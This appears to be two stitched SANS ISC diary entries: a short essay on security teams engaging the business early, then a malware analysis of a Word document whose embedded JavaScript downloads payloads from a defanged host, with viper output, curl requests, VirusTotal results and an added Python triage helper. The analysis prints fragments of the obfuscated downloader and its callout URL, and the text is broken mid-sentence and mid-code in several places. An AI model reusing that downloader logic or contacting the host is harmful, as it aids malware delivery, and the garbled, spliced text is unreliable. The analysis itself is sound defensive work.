A good friend told me that an engaged information security professional is one who leads with the KNOW instead of the NO. This comment struck me and has resonated well for the last several years. It has encouraged me to better understand the desires of the business areas in an attempt to avoid the perception of being the no police.

We are each able to recognize the value in sprinkling information security concepts early and often into software development projects. This approach saves each of the stakeholders a great deal of time and frustration, especially when compared to the very opposite approach, in which the information security team learns at the very last minute of a new high profile project that is about to launch without the proper level of information security engagement.

There are certainly projects and initiatives that may very well still warrant a no from an information security perspective. Before we go there by default, I respectfully invite us all to KNOW before we NO. I truly believe that each of us can improve the level of engagement with our respective business areas by considering this approach. In what areas can you KNOW before you NO next week?

Please leave what works in our comments section below.

Russell Eubanks

ISC Handler

@russelleubanks

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
We got many samples from our readers and we thank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common waves of spam but, sometimes, they are interesting. I

viper Order-complete.docx > info
| Key      | Value |
| Name     | Order-complete.docx |
| Tags     | whiteknight |
| Path     | /home/nonroot/.viper/binaries/2/9/d/c/29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 |
| Size     | 17034 |
| Type     | Microsoft Word 2007+ |
| Mime     | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| MD5      | 64b342c80a7f9e7ec1c85f1f0059feb3 |
| SHA1     | 5e0b0c0ed682139588f61f37eaf789003590b66a |
| SHA256   | 29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 |
| SHA512   | ae709954da0b03a85323e180961a393820a4289a52e1ae752f499a58947863df86cbb9f66a6a7fe5478f9b64278f055f10bc6ba1871df28f882f71d756cbae48 |
| SSdeep   | 384:TyD28Wf7rR+4pMyFvt3nr+Jjgozm3BTmDU:FpzrgeRrqXgMU |
| CRC32    | 58486E87 |
| Parent   | |
| Children | 25545563f98f99ee0274c2698eefbfec91e176d2165f755ca7ef455b3d468016, |

viper Order-complete.docx >

Sub Auto_Open()
Msgbox "Welcome to SANS ISC!"

viper Order-complete.docx > office -s
[*] Document Structure
 - [Content_Types].xml
 - _rels/.rels
 - word/_rels/document.xml.rels
 - word/document.xml
 - word/media/image1.emf
 - word/embeddings/oleObject1.bin
 - word/theme/theme1.xml
 - word/settings.xml
 - word/webSettings.xml
 - docProps/core.xml
 - word/styles.xml
 - word/fontTable.xml
 - docProps/app.xml
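As an added example (not code from the diary or from viper), here is a small Python triage helper for the case shown above: it lists the members of a .docx package and pulls out anything under word/embeddings/ or a vbaProject.bin, checking each for the OLE compound-file magic and for plain-text script fragments. The document it builds is constructed for the demonstration, with a harmless stand-in where the real sample carried its JavaScript.

```python
import io
import zipfile
from typing import Dict, List

# Compound-file (OLE) header magic; embedded objects under word/embeddings/ use it.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Byte strings that hint at a script body inside the object (mirrors the diary's JS).
SCRIPT_HINTS = (b"responseText", b"function ", b"var ")


def build_sample_docx() -> bytes:
    """Constructed sample: same member layout as the listing above, dummy contents."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("_rels/.rels", "<Relationships/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/media/image1.emf", b"\x01\x00\x00\x00")
        # Fake OLE object: valid magic, then a harmless stand-in for the JS body.
        z.writestr("word/embeddings/oleObject1.bin",
                   OLE_MAGIC + b"\x00" * 8 + b"var data = c.responseText;")
    return buf.getvalue()


def triage_docx(data: bytes) -> Dict[str, object]:
    """List package members and inspect embedded objects and VBA containers."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        members = z.namelist()
        for name in members:
            lname = name.lower()
            if not (lname.startswith("word/embeddings/") or lname.endswith("vbaproject.bin")):
                continue
            blob = z.read(name)
            findings.append({
                "name": name,
                "size": len(blob),
                "ole_magic": blob.startswith(OLE_MAGIC),
                # Plain byte scan only: real OLE streams may hold UTF-16 text, so a
                # miss here is not a clean bill of health; extract and inspect anyway.
                "script_hint": any(h in blob for h in SCRIPT_HINTS),
            })
    return {"members": members, "suspicious": findings}


if __name__ == "__main__":
    report = triage_docx(build_sample_docx())
    for finding in report["suspicious"]:
        print(finding)
```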

The JavaScript is located in word/embeddings/oleObject1.bin. Once extracted and stored in %APPDATA%\Local\Temp\Order complete.js, it is executed and downloads a malicious PE file. Let

try {
c.open(deobfus("----uFuwwu",1), deobfus("----qqq:qLU:qjqtqqq:UtF_qF_",1)+"?ff" + loop,
}
var data = c.responseText.indexOf("|||"

hxxp://dev.watershowbranson.com/info.php?ffX

x being incremented by the loop.

When you try to access this URL manually, you get different content depending on x:

$ curl hxxp://dev.watershowbranson.com/info.php?ff1
7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709571217747695712177476957121774769571217747695...(removed)
$ curl hxxp://dev.watershowbranson.com/info.php?ff2
7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841872402848018724028480187240284801872402848018...(removed)
$ curl hxxp://dev.watershowbranson.com/info.php?ff3
9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451692074764116920747641169207476411692074764116...(removed)

Note the |||

var daddbdbfeed = ebcebafed
}
function deobfus(s,key){
var fcddcdfcfcfc = "$d.JkT0_gOQ7F:%(*Z,[email protected])pbNhSGsloe5w"
var buffer = abcafefaddd
if (cfbbadafdfabf0) {

var foo = deobfus("----qqq:qLU:qjqtqqq:UtF_qF_"

hxxp://dev.watershowbranson.com/info.php

Data returned by the HTTP request uses another obfuscation technique. The data is passed to another function with the key being the array of integers (example as seen above).

viper cab4.exe > virustotal -v
[+] VirusTotal Report for 5dc3d99293fe7b70a9796cf04492b954:
[*] Detecting engines:
| Antivirus         | Signature |
| Baidu             | Win32.Trojan.WisdomEyes.16070401.9500.9999 |
| CrowdStrike       | malicious_confidence_100% (D) |
| Cyren             | W32/Spora.E.gen!Eldorado |
| Endgame           | malicious (high confidence) |
| F-Prot            | W32/Spora.E.gen!Eldorado |
| Fortinet          | W32/GenKryptik.ADNX!tr |
| Invincea          | virus.win32.sality.at |
| McAfee            | Ransomware-FMFE!5DC3D99293FE |
| McAfee-GW-Edition | BehavesLike.Win32.Backdoor.fc |
| Qihoo-360         | HEUR/QVM19.1.C414.Malware.Gen |
| SentinelOne       | static engine - malicious |
| Sophos            | Mal/Elenoocka-E |
| Symantec          | ML.Attribute.HighConfidence |
[*] 13 out of 61 antivirus detected 5dc3d99293fe7b70a9796cf04492b954 as malicious.
[*] https://www.virustotal.com/file/13e7a1f1291b0ddf1587d86b94989e0d8ff4884e3f2354810130a7865d0d431c/analysis/1493313215/

In this example, we have multiple payloads downloaded with their associated key (no direct PE file), and we don't see XOR encryption or Base64 encoding. Nothing suspicious, just plain text!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
